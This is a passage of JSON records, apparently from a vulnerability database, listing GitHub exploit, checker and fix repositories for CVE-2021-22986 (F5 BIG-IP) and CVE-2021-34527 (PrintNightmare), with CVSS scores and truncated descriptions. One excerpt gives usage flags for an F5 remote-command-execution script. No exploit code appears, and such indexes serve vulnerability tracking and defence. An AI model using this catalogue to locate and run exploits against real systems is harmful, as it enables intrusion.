"2022-08-13T09:03:21", "description": "# \u4f7f\u7528\r\n\r\n```\r\npython3 f5_rce.py \r\n\r\n-u \u6307\u5b9a\u76ee\u6807URL\r\n-f \u6279\u91cf\u68c0\u6d4b\u6587\u4ef6\r\n-c \u6267\u884c\u547d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T07:40:51", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-13T08:25:58", "id": "91A5A7DD-3544-5856-890C-F8D738DAC6F4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:28:22", "description": "# CVE-2021-22986\n\nThis is a simple script to ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T13:01:08", "type": "githubexploit", "title": "Exploit for Vulnerability in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-03-29T13:04:49", "id": "67F9A7F6-596E-5695-BCBF-B11FE476AD9E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:08:47", "description": "# CVE-2021-22986_Check\nCVE-2021-22986 Checker Script in Python3\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T02:04:39", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-05-21T00:55:58", "id": "48FD5EC4-10B3-5CB3-96C6-4D70E2A52EEF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:30:29", "description": "# CVE-2021-22986-Poc\nThis is a Poc for BIGIP iControl unauth RCE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T05:02:45", "type": "githubexploit", "title": "Exploit for Vulnerability in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-12-15T14:41:40", "id": "F6F649DA-905A-5158-B6BD-5A1F1F740C68", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:41:02", "description": "# CVE-2021-22986\nF5 BIG-IP/BIG-IQ iControl Rest...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T04:58:17", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-11-03T13:24:11", "id": "08530E98-10F4-5651-8118-F76E99D5856F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:19:02", "description": "## CVE-2021-22986\n\nThis vulnerability allows for unauthenticated...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-07T11:19:20", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2023-02-07T11:27:49", "id": "7209646A-510D-5B41-BE5F-315ADD499456", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:11:57", "description": "**F5 BIG-IP RCE / CVE-2021-22986\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e**\n\n**Code By:T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T05:56:21", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-15T15:41:48", "id": "9E6B39D2-4F46-5C9D-81B9-32A2C96CBAD8", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:40:57", "description": "# F5 BIG-IP \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-22986\uff09\n\n## \u6f0f\u6d1e\u5f71\u54cd\n\nF5 BIG-IP 16.x: 1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T03:32:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-05T07:21:07", "id": "BF090D08-5787-5245-85E4-88DA87E8EC1D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:34", "description": "# Fix-CVE-2021-34527\nFix for the securit...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T14:25:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-03T09:03:00", "id": "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:29:26", "description": "# PrintNightmare CVE-2021-34527\n\nBy now you most probably alread...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T07:58:53", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:16:25", "id": "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:19", "description": "# PowerShell-PrintNightmare\nA collection of scripts to help set ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T21:28:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-11T16:21:00", "id": "98CA9A39-577D-51F2-B8B9-B20E80D94173", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:16:59", "description": "# disable-RegisterSpoolerRemoteRpcEndPoint\nWorkaround for Window...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T16:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T21:11:43", "id": "E235B3DF-990F-5508-9496-90462B45125D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:56", "description": "PrintNightmare CVE-2021-34527 powershell PowerShell workaround t...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T20:02:50", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T13:34:12", "id": "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:55:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T01:32:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T03:54:14", "id": "1E42289A-77F8-55A2-B85E-83CAA00CE951", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T12:23:19", "description": "# Introduction\nPrintNightmare-Patcher, a simple tool that resolv...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T14:14:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:08", "id": "D089579B-4420-5AD5-999F-45063D972E66", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:22:28", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-13T10:04:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-12-13T10:21:38", "id": "3DC96731-93EE-5FF0-9AC3-C472059DC1AF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-25T22:03:53", "description": "# CVE-2021-34527\n\nCVE-2021-34527 LPE exploit using AddPrinterDri...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-05T23:48:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-08-25T17:42:32", "id": "436B5B97-EF58-5F05-B611-815DDEF67B8A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:24", "description": "# Printnightmare\nFix for PrintNightmare CVE-2021-34527\n\n![Printn...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T09:22:03", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T11:02:54", "id": "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-06T11:53:20", "description": "# PsFix-CVE-2021-34527\nFix-CVE-2021-34527\nFi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-07T20:14:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T20:18:26", "id": "26B4C125-95CE-54A5-82FB-2D1C219A09CB", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:32", "description": "# CVE-2021-34527-PrintNightmare-Workaround\n\nThis simple PowerShe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": 